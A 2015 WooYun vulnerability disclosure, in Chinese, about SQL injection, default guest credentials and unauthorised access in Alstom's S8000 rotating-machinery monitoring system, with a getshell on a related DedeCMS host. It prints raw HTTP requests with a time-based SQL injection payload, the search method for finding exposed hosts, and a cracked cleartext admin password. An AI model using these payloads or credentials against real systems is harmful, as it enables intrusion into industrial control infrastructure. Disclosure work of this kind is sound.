当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145966

漏洞标题:工控安全之某大型旋转机SQL注入通杀全版本(内网拓扑/可调频段/大量敏感文件泄漏/成功Getshell一枚)

相关厂商:Alstom

漏洞作者: 珈蓝夜宇

提交时间:2015-10-11 14:03

修复时间:2016-01-14 08:58

公开时间:2016-01-14 08:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-11: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-19: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-14: 细节向公众公开

简要描述:

不打雷誓不罢休之年轻人是并不需要休息的
这两天天天看别人打雷不小心发现了这个这个案例,换个思路就是一枚通杀!!!!
如果您要查看本帖隐藏内容请回复

详细说明:

查看打雷案例: http://**.**.**.**/bugs/wooyun-2010-0135197
关键字: SCG8000 旋转机械在线状态监测
通过网络空间搜索: 旋转机械在线状态监测
成功搜索到 S8000 旋转机械在线状态监测与分析系统
成功搜索到案例一枚
**.**.**.**:8089/
上面还带着账号, 密码呢
guest_s guest_s 其实是可以注入的

GET /default.asp?username=admin&userpassword=guest_s&lang=0&login=s8000& HTTP/1.1
Host: **.**.**.**:8089
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
DNT: 1
Referer: **.**.**.**:8089/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDSSBSSRRR=IEMPDKHAACJDABNIMADMLAPL; updateTips=true; language=zh; PHPSESSID=n49fsmb15gbuf4n8q3qko85i06; ASP.NET_SessionId=ymma2a2ogade0znpnm5wp3cw; ASPSESSIONIDCCADAQQS=CEPLJPHAMDMFDLGCLMNIDEGG; __utma=209175697.1832228353.1444478771.1444478771.1444478771.1; __utmc=209175697; __utmz=209175697.1444478771.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDSQASTRQQ=NJPJKPHAEIEIIDFLBGEDIFBE; DedeUserID=1; DedeUserID__ckMd5=513682e572e84453; DedeLoginTime=1444482489; DedeLoginTime__ckMd5=3338c8dffc8243d5; ASPSESSIONIDQSDSRQQR=CLLPDHNABPCNPOIBPBLDHMKI; s8k=Crt%5FDatabasePath%5F300=D%3A%5CMicrosoft+SQL+Server%5CMSSQL%5CData%5C&lang=0&DatabasePath%5Fs8k%5F300=C%3A%5CInetpub%5Cwwwroot%5Cpublic%5Cdatabase%5C&DatabaseType%5Fs8k%5F300=0


需要安装Java 2虚拟机J2RE1.4.2(或以上版本)才能正常浏览。
http://**.**.**.**/countries/china/our-locations/ 这是官网案例吧

2.png


阿尔斯通创为实 还是2008年的世界500强呢~

1.png


2.png


3.png


5.png


6.png


可调频率!!!

7.png


8.png


9.png


10.png


是8089端口,应该还开了其他端口 扫端口 结果如下:
**.**.**.**:8081/dede/ 我一看到这个dede,感觉有戏, 一个通讯录有必要用dede么?

2.png


查看文章 http://**.**.**.**/content/2414
成功得到账号密码 前减3位 后减一位 **.**.**.**解密 得到:
admin aza5572273
拿shell不解释了,我见过最简单的拿shell

1.png


里面全是站

3.png


由于开启了安全模式,不能执行命令,不知如何绕过,已经到了我技术的边沿了....
**.**.**.**:8082/
**.**.**.**:8086/
**.**.**.**:8087/
**.**.**.**:8088/custom/
**.**.**.**:81/
另外一枚:
**.**.**.**/ 这是没有guest_s的
发现SQL注入一枚

POST /default.asp HTTP/1.1
Content-Length: 405
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**/
Cookie: s8k=DatabaseType=0; ASPSESSIONIDSQSBDBDA=DCKJDKDAPEMMNJCNKEIBAECH
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
submit1=%b5%c7%c2%bc&IfRm=&IsFirst=0&JZGraphId=&menumark=1&Powers8000=0&s8000companyId=176&s8000companyName=%d4%a3%b6%ab%b5%e7%b3%a7&s8000FactoryType=0&s8000graph=S8000MachineGraph_Old&s8000keyid=&select=176_%d4%a3%b6%ab%b5%e7%b3%a7&stationid=&username=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&userpass=rivireqe


宝宝找到了这个

4.png


据我的分析,当旋转机停止的时候里面的分析是加载不出来的,我也不知道什么时候才开,什么时候关
**.**.**.**/
再一枚未授权访问

1.png


123.png


里面的内容大致与第一个相同,就不截图了
**.**.**.**/

漏洞证明:

**.**.**.**:8089/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
其实有几个国外的ip,不知道我这里是不是不能访问还是怎么样 就是打不开

修复方案:

过滤
管理者删除该guest_s这个用户
更改已经泄露的密码

版权声明:转载请注明来源 珈蓝夜宇@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-16 08:57

厂商回复:


CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无